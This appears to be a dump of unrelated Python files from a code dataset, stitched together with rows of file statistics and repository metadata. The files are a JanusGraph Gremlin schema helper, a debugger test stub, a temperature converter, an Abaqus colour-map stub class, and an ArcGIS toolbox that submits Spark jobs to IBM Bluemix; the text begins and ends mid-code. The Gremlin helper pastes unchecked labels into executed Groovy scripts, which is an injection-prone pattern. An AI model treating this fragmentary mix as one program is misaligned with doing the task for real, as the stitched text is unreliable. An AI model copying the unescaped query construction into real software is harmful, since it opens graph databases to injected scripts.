_ = self.gremlin_client.execute_query(
"g.E().group().by(label).by(properties().label().dedup().fold())",
serialize_elements=False
)
return {"label": label, "propertyKeys": _[0].get(label, [])}
def create_vertex_label_schema(self, label: str, namespace: str = None):
try:
_ = self.gremlin_client.execute_query(
f"""
mgmt = graph.openManagement()
person = mgmt.makeVertexLabel('{label}').make()
mgmt.commit()
""",
# "person = graph.addVertex(label, '" + label + "')",
serialize_elements=False
)
return {"status": True, "message": "ok"}
except Exception as e:
return {"status": False, "message": e.__str__()}
def create_edge_label_schema(self, label: str, multiplicity: str = None, namespace: str = None):
# https://docs.janusgraph.org/basics/schema/#edge-label-multiplicity
query = f"""
mgmt = graph.openManagement()
person = mgmt.makeEdgeLabel('{label}')"""
if multiplicity:
query += f".cardinality(Cardinality.{multiplicity.upper()})"
query += ".make()"
query += f"""
mgmt.commit()
"""
try:
_ = self.gremlin_client.execute_query(
query,
serialize_elements=False
)
return {"status": True, "message": "ok"}
except Exception as e:
return {"status": False, "message": e.__str__()}
def create_vertex_property_schema(self,
label: str,
property_key: str,
data_type: str,
cardinality: str):
"""
:param label:
:param property_key:
:param data_type:
:param cardinality: SINGLE, LIST , SET
:return:
"""
query = f"""
mgmt = graph.openManagement()
{property_key}_prop = mgmt.makePropertyKey('{property_key}')
"""
if data_type:
query += f".dataType({data_type}.class)"
if cardinality:
query += f".cardinality(Cardinality.{cardinality.upper()})"
query += ".make()"
query += f"""
{label}_label = mgmt.getVertexLabel("{label}")
mgmt.addProperties({label}_label, {property_key}_prop)
mgmt.commit()
"""
print("====", query)
try:
_ = self.gremlin_client.execute_query(
query,
serialize_elements=False
)
print("====", _)
return {"status": True, "message": "ok"}
except Exception as e:
return {"status": False, "message": e.__str__()}
def create_edge_property_schema(self,
label: str,
property_key: str,
data_type: str,
cardinality: str):
"""
:param label:
:param property_key:
:param data_type:
:param cardinality: SINGLE, LIST , SET
:return:
"""
query = f"""
mgmt = graph.openManagement()
{property_key}_prop = mgmt.makePropertyKey('{property_key}')
"""
if data_type:
query += f".dataType({data_type}.class)"
if cardinality:
query += f".cardinality(Cardinality.{cardinality.upper()})"
query += ".make()"
query += f"""
{label}_label = mgmt.getEdgeLabel("{label}")
mgmt.addProperties({label}_label, {property_key}_prop)
mgmt.commit()
"""
try:
_ = self.gremlin_client.execute_query(
query,
serialize_elements=False
)
print("====", _)
return {"status": True, "message": "ok"}
except Exception as e:
return {"status": False, "message": e.__str__()}
| 33.427746 | 100 | 0.498184 | 519 | 5,783 | 5.33526 | 0.181118 | 0.026002 | 0.049115 | 0.069339 | 0.829541 | 0.822319 | 0.802817 | 0.774648 | 0.767425 | 0.749007 | 0 | 0.000553 | 0.3742 | 5,783 | 172 | 101 | 33.622093 | 0.764576 | 0.063289 | 0 | 0.738806 | 0 | 0 | 0.274528 | 0.151887 | 0 | 0 | 0 | 0.005814 | 0 | 1 | 0.059701 | false | 0 | 0.022388 | 0 | 0.179104 | 0.022388 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
28fa2ef3c41b8775d22c1ef80d6a472be871b226 | 129 | py | Python | Python/Tests/TestData/DebuggerProject/BreakpointNonMainFileRemoved.py | nanshuiyu/pytools | 9f9271fe8cf564b4f94e9456d400f4306ea77c23 | [
"Apache-2.0"
] | null | null | null | Python/Tests/TestData/DebuggerProject/BreakpointNonMainFileRemoved.py | nanshuiyu/pytools | 9f9271fe8cf564b4f94e9456d400f4306ea77c23 | [
"Apache-2.0"
] | null | null | null | Python/Tests/TestData/DebuggerProject/BreakpointNonMainFileRemoved.py | nanshuiyu/pytools | 9f9271fe8cf564b4f94e9456d400f4306ea77c23 | [
"Apache-2.0"
] | null | null | null | import BreakpointNonMainFileRemovedImported
BreakpointNonMainFileRemovedImported.f()
BreakpointNonMainFileRemovedImported.f() | 32.25 | 44 | 0.899225 | 6 | 129 | 19.333333 | 0.5 | 0.637931 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.054264 | 129 | 4 | 45 | 32.25 | 0.95082 | 0 | 0 | 0.666667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 1 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
3a6e38f9a2e47204199e0a0684c7eb8c1b02803e | 134 | py | Python | .idea/VirtualEnvironment/Lib/site-packages/tests/outcomes/infinite_loop/infinite_loop_test_input_request/main.py | Vladpetr/NewsPortal | cd4127fbc09d9c8f5e65c8ae699856c6d380a320 | [
"Apache-2.0"
] | null | null | null | .idea/VirtualEnvironment/Lib/site-packages/tests/outcomes/infinite_loop/infinite_loop_test_input_request/main.py | Vladpetr/NewsPortal | cd4127fbc09d9c8f5e65c8ae699856c6d380a320 | [
"Apache-2.0"
] | 5 | 2021-04-08T22:02:15.000Z | 2022-02-10T14:53:45.000Z | .idea/VirtualEnvironment/Lib/site-packages/tests/outcomes/infinite_loop/infinite_loop_test_input_request/main.py | Vladpetr/NewsPortal | cd4127fbc09d9c8f5e65c8ae699856c6d380a320 | [
"Apache-2.0"
] | null | null | null |
while True:
print("Long Line Long Line Long Line")
try:
print(input())
except Exception as ex:
print(ex)
| 16.75 | 42 | 0.574627 | 18 | 134 | 4.277778 | 0.611111 | 0.311688 | 0.311688 | 0.415584 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.328358 | 134 | 7 | 43 | 19.142857 | 0.855556 | 0 | 0 | 0 | 0 | 0 | 0.218045 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0 | 0 | 0 | 0.5 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 7 |
3a88986f63d1ac5835122c8fac78673dd12f6519 | 619 | py | Python | _solutions/intermediate/test/test_doctest_a.py | sages-pl/2022-01-pythonsqlalchemy-aptiv | 1d6d856608e9dbe25b139e8968c48b7f46753b84 | [
"MIT"
] | null | null | null | _solutions/intermediate/test/test_doctest_a.py | sages-pl/2022-01-pythonsqlalchemy-aptiv | 1d6d856608e9dbe25b139e8968c48b7f46753b84 | [
"MIT"
] | null | null | null | _solutions/intermediate/test/test_doctest_a.py | sages-pl/2022-01-pythonsqlalchemy-aptiv | 1d6d856608e9dbe25b139e8968c48b7f46753b84 | [
"MIT"
] | null | null | null |
def celsius_to_kelvin(degrees):
if type(degrees) in (int, float):
return 273.15 + degrees
if type(degrees) is tuple:
return tuple(x + 273.15 for x in degrees)
if type(degrees) is list:
return list(x + 273.15 for x in degrees)
if type(degrees) is set:
return set(x + 273.15 for x in degrees)
raise TypeError('Invalid argument')
## Solution 2
# if type(degrees) in (int, float):
# return 273.15 + degrees
#
# if type(degrees) in (list, tuple, set):
# cls = type(degrees)
# return cls(x+273.15 for x in degrees)
#
# raise TypeError('Invalid argument')
| 23.807692 | 49 | 0.628433 | 96 | 619 | 4.03125 | 0.270833 | 0.198966 | 0.20155 | 0.258398 | 0.731266 | 0.702842 | 0.702842 | 0.702842 | 0.702842 | 0.702842 | 0 | 0.067245 | 0.25525 | 619 | 25 | 50 | 24.76 | 0.772234 | 0.345719 | 0 | 0 | 0 | 0 | 0.040712 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.1 | false | 0 | 0 | 0 | 0.5 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
3ad34813102610b9523d4b48a2bb54b1a3a08596 | 5,912 | py | Python | src/abaqus/Canvas/AttributeColorMap.py | Haiiliin/PyAbaqus | f20db6ebea19b73059fe875a53be370253381078 | [
"MIT"
] | 7 | 2022-01-21T09:15:45.000Z | 2022-02-15T09:31:58.000Z | src/abaqus/Canvas/AttributeColorMap.py | Haiiliin/PyAbaqus | f20db6ebea19b73059fe875a53be370253381078 | [
"MIT"
] | null | null | null | src/abaqus/Canvas/AttributeColorMap.py | Haiiliin/PyAbaqus | f20db6ebea19b73059fe875a53be370253381078 | [
"MIT"
] | null | null | null | from abaqusConstants import *
class AttributeColorMap:
"""The AttributeColorMap object is used to store values and attributes associated with
AttributeColorMap type objects. AttributeColorMap objects can be modified using the
methods described below. The methods accessed via the Viewport object cause the
AttributeColorMap object to be updated in the session.viewports[name].colorMappings
repository.
Attributes
----------
mapType: SymbolicConstant
A SymbolicConstant specifying the type of AttributeColorMap . Possible values are
MATERIAL_MAP, SECTION_MAP, PART_MAP, ELSET_MAP, AVERAGING_REGION_MAP, and ELTYPE_MAP.
overrides: dict
A :py:class:`~.Dictionary` object specifying a color mapping. Each key is of String type and specifies
an attribute in the map; the corresponding values specify the color definition to apply
to that attribute in the form (0|1, wire color, edge color, face color). The 0|1 defines
the active status for the attribute. For example:`overrides={
'Part-1':(1,'00FF00', '00CCFF', '00FF00')}`
defaultOverrides: dict
A :py:class:`~.Dictionary` object specifying a custom color mapping similar to overrides. For
example:`defaultOverrides={ 'Copper':(1,''00FF00', '00CCFF',
'00FF00')}`The color mapping can contain keys that have not been
created. When the key is created, it gets the appropriate values from this mapping.
attributeColors: dict
A :py:class:`~.Dictionary` object specifying the color settings of each attribute as described in the
[updateOverrides
](https://help.3ds.com/2022/english/DSSIMULIA_Established/SIMACAEKERRefMap/simaker-c-attributecolormappyc.htm?ContextScope=allsimaker-attributecolormapupdateoverridespyc)method.
Notes
-----
This object can be accessed by:
.. code-block::
session.viewports[name].colorMappings[name]
"""
# A SymbolicConstant specifying the type of AttributeColorMap . Possible values are
# MATERIAL_MAP, SECTION_MAP, PART_MAP, ELSET_MAP, AVERAGING_REGION_MAP, and ELTYPE_MAP.
mapType: SymbolicConstant = None
# A Dictionary object specifying a color mapping. Each key is of String type and specifies
# an attribute in the map; the corresponding values specify the color definition to apply
# to that attribute in the form (0|1, wire color, edge color, face color). The 0|1 defines
# the active status for the attribute. For example:`overrides={
# 'Part-1':(1,'#00FF00', '#00CCFF', '#00FF00')}`
overrides: dict = None
# A Dictionary object specifying a custom color mapping similar to overrides. For
# example:`defaultOverrides={ 'Copper':(1,''#00FF00', '#00CCFF',
# '#00FF00')}`The color mapping can contain keys that have not been
# created. When the key is created, it gets the appropriate values from this mapping.
defaultOverrides: dict = None
# A Dictionary object specifying the color settings of each attribute as described in the
# [updateOverrides
# ](https://help.3ds.com/2022/english/DSSIMULIA_Established/SIMACAEKERRefMap/simaker-c-attributecolormappyc.htm?ContextScope=all#simaker-attributecolormapupdateoverridespyc)method.
attributeColors: dict = None
def setDefaults(self):
"""This method resets the AttributeColorMap object to its default state.
"""
pass
def setValues(self, overrides: dict = None, defaultOverrides: dict = None):
"""This method modifies the AttributeColorMap object.
Parameters
----------
overrides
A Dictionary object specifying a color mapping. Each key is of String type and specifies
an attribute in the map; the corresponding values specify the color definition to apply
to that attribute in the form (0|1, wire color, edge color, face color). The 0|1 defines
the active status for the attribute. For example:`overrides={
'Part-1':(1,'#00FF00', '#00CCFF', '#00FF00')}`
defaultOverrides
A Dictionary object specifying a custom color mapping similar to overrides. For
example:`defaultOverrides={ 'Copper':(1,''#00FF00', '#00CCFF',
'#00FF00')}`The color mapping can contain keys that have not been
created. When the key is created, it gets the appropriate values from this mapping.
"""
pass
def updateOverrides(self, overrides: dict = None, defaultOverrides: dict = None):
"""This method specifies additional overrides to be added to the current object definition.
Parameters
----------
overrides
A Dictionary object specifying a color mapping. Each key is of String type and specifies
an attribute in the map; the corresponding values specify the color definition to apply
to that attribute in the form (0|1, wire color, edge color, face color). The 0|1 defines
the active status for the attribute. For example:`overrides={
'Part-1':(1,'#00FF00', '#00CCFF', '#00FF00')}`
defaultOverrides
A Dictionary object specifying a custom color mapping similar to overrides. For
example:`defaultOverrides={ 'Copper':(1,''#00FF00', '#00CCFF',
'#00FF00')}`The color mapping can contain keys that have not been
created. When the key is created, it gets the appropriate values from this mapping.
"""
pass
| 55.773585 | 185 | 0.647835 | 684 | 5,912 | 5.576023 | 0.200292 | 0.037756 | 0.06817 | 0.056633 | 0.775302 | 0.775302 | 0.769795 | 0.766649 | 0.760357 | 0.731515 | 0 | 0.027544 | 0.275372 | 5,912 | 105 | 186 | 56.304762 | 0.862745 | 0.841171 | 0 | 0.25 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.25 | false | 0.25 | 0.083333 | 0 | 0.75 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 8 |
aafe66c390015358a1ecea40c204c93b2642b533 | 26,477 | pyt | Python | GeoBinToolbox.pyt | mraad/arcgis-bluemix | 1e3abe82f07336c3f89ea1a6cb0ef9f7c6f93c89 | [
"Apache-2.0"
] | 2 | 2017-03-07T20:21:33.000Z | 2017-07-06T20:00:23.000Z | GeoBinToolbox.pyt | mraad/arcgis-bluemix | 1e3abe82f07336c3f89ea1a6cb0ef9f7c6f93c89 | [
"Apache-2.0"
] | 1 | 2017-03-07T23:38:50.000Z | 2017-03-08T17:30:05.000Z | GeoBinToolbox.pyt | mraad/arcgis-bluemix | 1e3abe82f07336c3f89ea1a6cb0ef9f7c6f93c89 | [
"Apache-2.0"
] | null | null | null | import arcpy
import io
import json
import os
import requests
import swiftclient.client as swiftclient
import time
from urllib.parse import urlparse
class Toolbox(object):
def __init__(self):
self.alias = "GeoBinToolbox"
self.label = "GeoBin Toolbox"
self.tools = [
UploadTool,
RemoveTool,
GeoBinTool
]
class UploadTool(object):
def __init__(self):
self.label = "Upload GeoBin"
self.description = "Upload GeoBin"
self.canRunInBackground = True
def getParameterInfo(self):
bm_path = arcpy.Parameter(
name="bm_path",
displayName="Bluemix JSON Path",
direction="Input",
datatype="File",
parameterType="Required")
bm_path.value = os.path.join(os.path.dirname(__file__), "bluemix.json")
py_path = arcpy.Parameter(
name="py_path",
displayName="GeoBin Python Path",
direction="Input",
datatype="File",
parameterType="Required")
py_path.value = os.path.join(os.path.dirname(__file__), "GeoBin.py")
return [bm_path, py_path]
def isLicensed(self):
return True
def updateParameters(self, parameters):
return
def updateMessages(self, parameters):
return
def execute(self, parameters, messages):
bm_path = parameters[0].valueAsText
py_path = parameters[1].valueAsText
head, tail = os.path.split(py_path)
with open(bm_path) as bm_file:
bluemix = json.load(bm_file)
spark = bluemix["spark"]
with open(py_path, "rb") as data:
url = "https://spark.bluemix.net/tenant/data/{}/{}".format(spark["instance_id"], tail)
headers = {
"X-Spark-service-instance-id": spark["instance_id"]
}
r = requests.put(url,
auth=(spark["tenant_id"], spark["tenant_secret"]),
headers=headers,
data=data
)
arcpy.AddMessage(json.dumps(r.json()))
class DownloadTool(object):
def __init__(self):
self.label = "Download Python File"
self.description = "Download Python File"
self.canRunInBackground = True
def getParameterInfo(self):
bm_path = arcpy.Parameter(
name="bm_path",
displayName="Bluemix JSON Path",
direction="Input",
datatype="File",
parameterType="Required")
bm_path.value = os.path.join(os.path.dirname(__file__), "bluemix.json")
py_path = arcpy.Parameter(
name="py_path",
displayName="GeoBin Python Path",
direction="Input",
datatype="File",
parameterType="Required")
py_path.value = os.path.join(os.path.dirname(__file__), "GeoBin.py")
return [bm_path, py_path]
def isLicensed(self):
return True
def updateParameters(self, parameters):
return
def updateMessages(self, parameters):
return
def execute(self, parameters, messages):
bm_path = parameters[0].valueAsText
py_path = parameters[1].valueAsText
head, tail = os.path.split(py_path)
with open(bm_path) as bm_file:
bluemix = json.load(bm_file)
spark = bluemix["spark"]
url = "https://spark.bluemix.net/tenant/data/{}/{}".format(spark["instance_id"], tail)
headers = {
"X-Spark-service-instance-id": spark["instance_id"]
}
r = requests.get(url,
auth=(spark["tenant_id"], spark["tenant_secret"]),
headers=headers
)
arcpy.AddMessage(r.text)
class RemoveTool(object):
def __init__(self):
self.label = "Remove GeoBin"
self.description = "Remove GeoBin"
self.canRunInBackground = True
def getParameterInfo(self):
bm_path = arcpy.Parameter(
name="bm_path",
displayName="Bluemix JSON Path",
direction="Input",
datatype="File",
parameterType="Required")
bm_path.value = os.path.join(os.path.dirname(__file__), "bluemix.json")
return [bm_path]
def isLicensed(self):
return True
def updateParameters(self, parameters):
return
def updateMessages(self, parameters):
return
def execute(self, parameters, messages):
bm_path = parameters[0].valueAsText
with open(bm_path) as bm_file:
bluemix = json.load(bm_file)
spark = bluemix["spark"]
url = "https://spark.bluemix.net/tenant/data/" + spark["instance_id"]
headers = {
"X-Spark-service-instance-id": spark["instance_id"]
}
r = requests.delete(url,
auth=(spark["tenant_id"], spark["tenant_secret"]),
headers=headers
)
resp = r.json()
if "file_error" in resp:
arcpy.AddWarning(json.dumps(resp))
else:
arcpy.AddMessage(json.dumps(resp))
class GeoBinTool(object):
def __init__(self):
self.wait_try = 0
self.wait_max = 30
self.wait_sec = 7
self.running = True
self.spark = {}
self.storage = {}
self.label = "GeoBin Analysis"
self.description = "GeoBin Analysis"
self.canRunInBackground = True
def getParameterInfo(self):
out_fc = arcpy.Parameter(
name="out_fc",
displayName="out_fc",
direction="Output",
datatype="Feature Layer",
parameterType="Derived")
out_fc.symbology = os.path.join(os.path.dirname(__file__), "GeoBin.lyrx")
bm_path = arcpy.Parameter(
name="bm_path",
displayName="Bluemix JSON Path",
direction="Input",
datatype="File",
parameterType="Required")
bm_path.value = os.path.join(os.path.dirname(__file__), "bluemix.json")
input_path = arcpy.Parameter(
name="input_path",
displayName="Swift Input Path",
direction="Input",
datatype="String",
parameterType="Required")
input_path.value = "swift2d://trips.thunder/trips-1M.csv"
output_path = arcpy.Parameter(
name="output_path",
displayName="Swift Output Path",
direction="Input",
datatype="String",
parameterType="Required")
output_path.value = "swift2d://output.thunder/GeoBins"
bin_size = arcpy.Parameter(
name="bin_size",
displayName="Bin Size",
direction="Input",
datatype="String",
parameterType="Required")
bin_size.value = "0.001"
del_folder = arcpy.Parameter(
name="del_folder",
displayName="Delete Work Folder",
direction="Input",
datatype="Boolean",
parameterType="Optional")
del_folder.value = True
return [out_fc, bm_path, input_path, output_path, bin_size, del_folder]
def isLicensed(self):
return True
def updateParameters(self, parameters):
return
def updateMessages(self, parameters):
return
def check_status(self):
while self.running and self.wait_try < self.wait_max:
time.sleep(self.wait_sec)
self.wait_try += 1
headers = {"X-Requested-With": "spark-submit"}
data = {
"sparkProperties": {
"spark.service.tenant_id": self.spark["tenant_id"],
"spark.service.instance_id": self.spark["instance_id"],
"spark.service.tenant_secret": self.spark["tenant_secret"],
"spark.service.spark_version": "2.0"
}
}
arcpy.AddMessage(json.dumps(data))
r = requests.get("https://spark.bluemix.net/v1/submissions/status/" + self.spark["submissionId"],
headers=headers,
json=data
)
resp = r.json()
arcpy.SetProgressorLabel("{} {}".format(resp["driverState"], self.wait_try))
self.running = resp["success"] and resp["driverState"] == "RUNNING"
yield resp
def del_workdir(self):
url = "https://spark.bluemix.net/tenant/data/workdir/" + self.spark["submissionId"]
headers = {
"X-Spark-service-instance-id": self.spark["instance_id"]
}
r = requests.delete(url,
auth=(self.spark["tenant_id"], self.spark["tenant_secret"]),
headers=headers
)
arcpy.AddMessage(json.dumps(r.json()))
def insert_bins(self, fc, lines):
with arcpy.da.InsertCursor(fc, ["SHAPE@XY", "POP"]) as cursor:
for line in lines:
t = line.decode().rstrip().split(",")
if len(t) == 3:
shape_x = float(t[0])
shape_y = float(t[1])
pop = int(t[2])
cursor.insertRow(((shape_x, shape_y), pop))
def import_bins(self, parameters):
url = urlparse(parameters[3].value)
container, _ = url.netloc.split(".")
name = url.path[1:]
part = name + "/part"
in_memory = True
if in_memory:
ws = "in_memory"
fc = ws + "/" + name
else:
fc = os.path.join(arcpy.env.scratchGDB, name)
ws = os.path.dirname(fc)
if arcpy.Exists(fc):
arcpy.management.Delete(fc)
sp_ref = arcpy.SpatialReference(4326)
arcpy.management.CreateFeatureclass(ws, name, "POINT",
spatial_reference=sp_ref,
has_m="DISABLED",
has_z="DISABLED")
arcpy.management.AddField(fc, "POP", "LONG")
arcpy.SetProgressorLabel("Finding Parts...")
conn = swiftclient.Connection(
key=self.storage["password"],
authurl=self.storage["auth_url"] + "/v3",
auth_version="3",
os_options={
"project_id": self.storage["projectId"],
"user_id": self.storage["userId"],
"region_name": self.storage["region"]
})
for data in conn.get_container(container)[1]:
object_name = data['name']
if object_name.startswith(part):
arcpy.SetProgressorLabel(object_name)
_, body = conn.get_object(container, object_name)
self.insert_bins(fc, io.BytesIO(body))
parameters[0].value = fc
def execute(self, parameters, messages):
bm_path = parameters[1].valueAsText
inp_path = parameters[2].valueAsText
out_path = parameters[3].valueAsText
bin_size = parameters[4].valueAsText
del_work = parameters[5].value
with open(bm_path) as bm_file:
bluemix = json.load(bm_file)
epoch = int(time.time())
spark = bluemix["spark"]
storage = bluemix["storage"]
url = "https://spark.bluemix.net/v1/submissions/create"
headers = {"X-Requested-With": "spark-submit"}
data = {
"action": "CreateSubmissionRequest",
"appArgs": [
"--primary-py-file",
"GeoBin.py"
],
"appResource": "{}/GeoBin.py".format(spark["instance_id"]),
"clientSparkVersion": "2.0",
"mainClass": "org.apache.spark.deploy.PythonRunner",
"sparkProperties": {
"spark.app.name": "GeoBin{}".format(epoch),
"spark.files": "{}/GeoBin.py".format(spark["instance_id"]),
"spark.service.spark_version": "2.0",
"spark.service.tenant_id": spark["tenant_id"],
"spark.service.instance_id": spark["instance_id"],
"spark.service.tenant_secret": spark["tenant_secret"],
"spark.service.user.fs.swift2d.impl": "com.ibm.stocator.fs.ObjectStoreFileSystem",
"spark.service.user.fs.swift2d.service.thunder.auth.method": "keystoneV3",
"spark.service.user.fs.swift2d.service.thunder.auth.endpoint.prefix": "endpoints",
"spark.service.user.fs.swift2d.service.thunder.auth.url": storage[
"auth_url"] + "/v3/auth/tokens",
"spark.service.user.fs.swift2d.service.thunder.region": storage["region"],
"spark.service.user.fs.swift2d.service.thunder.tenant": storage["projectId"],
"spark.service.user.fs.swift2d.service.thunder.username": storage["userId"],
"spark.service.user.fs.swift2d.service.thunder.password": storage["password"],
"spark.service.user.fs.swift2d.service.thunder.public": "true",
"spark.service.user.input.path": inp_path,
"spark.service.user.output.path": out_path,
"spark.service.user.cell.size": bin_size
}
}
r = requests.post(url,
headers=headers,
json=data
)
resp = r.json()
text = json.dumps(resp)
if "success" in resp and resp["success"]:
if False:
with open(os.path.join(os.path.dirname(__file__), "submit-res.json"), "w") as f:
f.write(text)
spark["submissionId"] = resp["submissionId"]
self.spark = spark
self.storage = storage
self.running = True
for resp in self.check_status():
arcpy.AddMessage(json.dumps(resp))
if resp["success"]:
self.import_bins(parameters)
if del_work:
self.del_workdir()
else:
arcpy.AddError(text)
class StatusTool(object):
def __init__(self):
self.label = "GeoBin Status"
self.description = "GeoBin Status"
self.canRunInBackground = True
def getParameterInfo(self):
bm_path = arcpy.Parameter(
name="bm_path",
displayName="Bluemix JSON Path",
direction="Input",
datatype="File",
parameterType="Required")
bm_path.value = os.path.join(os.path.dirname(__file__), "bluemix.json")
submit_path = arcpy.Parameter(
name="submit_path",
displayName="Submit File",
direction="Input",
datatype="File",
parameterType="Required")
submit_path.value = os.path.join(os.path.dirname(__file__), "submit-res.json")
return [bm_path, submit_path]
def isLicensed(self):
return True
def updateParameters(self, parameters):
return
def updateMessages(self, parameters):
return
def execute(self, parameters, messages):
bm_path = parameters[0].valueAsText
submit_path = parameters[1].valueAsText
with open(bm_path) as bm_file:
bluemix = json.load(bm_file)
spark = bluemix["spark"]
with open(submit_path) as submit_file:
submit = json.load(submit_file)
headers = {"X-Requested-With": "spark-submit"}
data = {
"sparkProperties": {
"spark.service.tenant_id": spark["tenant_id"],
"spark.service.instance_id": spark["instance_id"],
"spark.service.tenant_secret": spark["tenant_secret"],
"spark.service.spark_version": "2.0"
}
}
r = requests.get("https://spark.bluemix.net/v1/submissions/status/" + submit["submissionId"],
headers=headers,
json=data
)
text = json.dumps(r.json())
arcpy.AddMessage(text)
with open(os.path.join(os.path.dirname(__file__), "status.json"), "w") as f:
f.write(text)
class DeleteWorkdirTool(object):
def __init__(self):
self.label = "Delete Work Dir"
self.description = "Delete Work Dir"
self.canRunInBackground = True
def getParameterInfo(self):
bm_path = arcpy.Parameter(
name="bm_path",
displayName="Bluemix JSON Path",
direction="Input",
datatype="File",
parameterType="Required")
bm_path.value = os.path.join(os.path.dirname(__file__), "bluemix.json")
submit_path = arcpy.Parameter(
name="submit_path",
displayName="Submit File",
direction="Input",
datatype="File",
parameterType="Required")
submit_path.value = os.path.join(os.path.dirname(__file__), "submit-res.json")
return [bm_path, submit_path]
def isLicensed(self):
return True
def updateParameters(self, parameters):
return
def updateMessages(self, parameters):
return
def execute(self, parameters, messages):
bm_path = parameters[0].valueAsText
submit_path = parameters[1].valueAsText
with open(bm_path) as bm_file:
bluemix = json.load(bm_file)
spark = bluemix["spark"]
with open(submit_path) as submit_file:
submit = json.load(submit_file)
url = "https://spark.bluemix.net/tenant/data/workdir/" + submit["submissionId"]
headers = {
"X-Spark-service-instance-id": spark["instance_id"]
}
r = requests.delete(url,
auth=(spark["tenant_id"], spark["tenant_secret"]),
headers=headers
)
resp = r.json()
if "file_error" in resp:
arcpy.AddWarning(json.dumps(resp))
else:
arcpy.AddMessage(json.dumps(resp))
class DownloadFileTool(object):
def __init__(self):
self.label = "Download Debug Files"
self.description = "Download Debug Files"
self.canRunInBackground = True
def getParameterInfo(self):
bm_path = arcpy.Parameter(
name="bm_path",
displayName="Bluemix JSON Path",
direction="Input",
datatype="File",
parameterType="Required")
bm_path.value = os.path.join(os.path.dirname(__file__), "bluemix.json")
submit_path = arcpy.Parameter(
name="submit_path",
displayName="Submit File",
direction="Input",
datatype="File",
parameterType="Required")
submit_path.value = os.path.join(os.path.dirname(__file__), "submit-res.json")
err_out = arcpy.Parameter(
name="err_out",
displayName="File Type",
direction="Input",
datatype="String",
parameterType="Required")
err_out.value = "stderr"
err_out.filter.type = "ValueList"
err_out.filter.list = ["stderr", "stdout"]
return [bm_path, submit_path, err_out]
def isLicensed(self):
return True
def updateParameters(self, parameters):
return
def updateMessages(self, parameters):
return
def execute(self, parameters, messages):
bm_path = parameters[0].valueAsText
submit_path = parameters[1].valueAsText
err_out = parameters[2].valueAsText
with open(bm_path) as bm_file:
bluemix = json.load(bm_file)
spark = bluemix["spark"]
with open(submit_path) as submit_file:
submit = json.load(submit_file)
url = "https://spark.bluemix.net/tenant/data/workdir/" + submit["submissionId"] + "/" + err_out
headers = {
"X-Spark-service-instance-id": spark["instance_id"]
}
r = requests.get(url,
auth=(spark["tenant_id"], spark["tenant_secret"]),
headers=headers
)
with open(os.path.join(os.path.dirname(__file__), err_out + ".txt"), "w") as open_file:
open_file.write(r.text)
class SubmitTool(object):
def __init__(self):
self.wait_try = 0
self.wait_max = 30
self.wait_sec = 7
self.running = True
self.spark = {}
self.storage = {}
self.label = "GeoBin Submit"
self.description = "GeoBin Submit"
self.canRunInBackground = True
def getParameterInfo(self):
out_fc = arcpy.Parameter(
name="out_fc",
displayName="out_fc",
direction="Output",
datatype="Feature Layer",
parameterType="Derived")
out_fc.symbology = os.path.join(os.path.dirname(__file__), "GeoBin.lyrx")
bm_path = arcpy.Parameter(
name="bm_path",
displayName="Bluemix JSON Path",
direction="Input",
datatype="File",
parameterType="Required")
bm_path.value = os.path.join(os.path.dirname(__file__), "bluemix.json")
input_path = arcpy.Parameter(
name="input_path",
displayName="Swift Input Path",
direction="Input",
datatype="String",
parameterType="Required")
input_path.value = "swift2d://trips.thunder/trips-1M.csv"
output_path = arcpy.Parameter(
name="output_path",
displayName="Swift Output Path",
direction="Input",
datatype="String",
parameterType="Required")
output_path.value = "swift2d://output.thunder/GeoBins"
bin_size = arcpy.Parameter(
name="bin_size",
displayName="Bin Size",
direction="Input",
datatype="String",
parameterType="Required")
bin_size.value = "0.001"
return [out_fc, bm_path, input_path, output_path, bin_size]
def isLicensed(self):
return True
def updateParameters(self, parameters):
return
def updateMessages(self, parameters):
return
def execute(self, parameters, messages):
bm_path = parameters[1].valueAsText
inp_path = parameters[2].valueAsText
out_path = parameters[3].valueAsText
bin_size = parameters[4].valueAsText
with open(bm_path) as bm_file:
bluemix = json.load(bm_file)
epoch = int(time.time())
spark = bluemix["spark"]
storage = bluemix["storage"]
url = "https://spark.bluemix.net/v1/submissions/create"
headers = {"X-Requested-With": "spark-submit"}
data = {
"action": "CreateSubmissionRequest",
"appArgs": [
"--primary-py-file",
"GeoBin.py"
],
"appResource": "{}/GeoBin.py".format(spark["instance_id"]),
"clientSparkVersion": "2.0",
"mainClass": "org.apache.spark.deploy.PythonRunner",
"sparkProperties": {
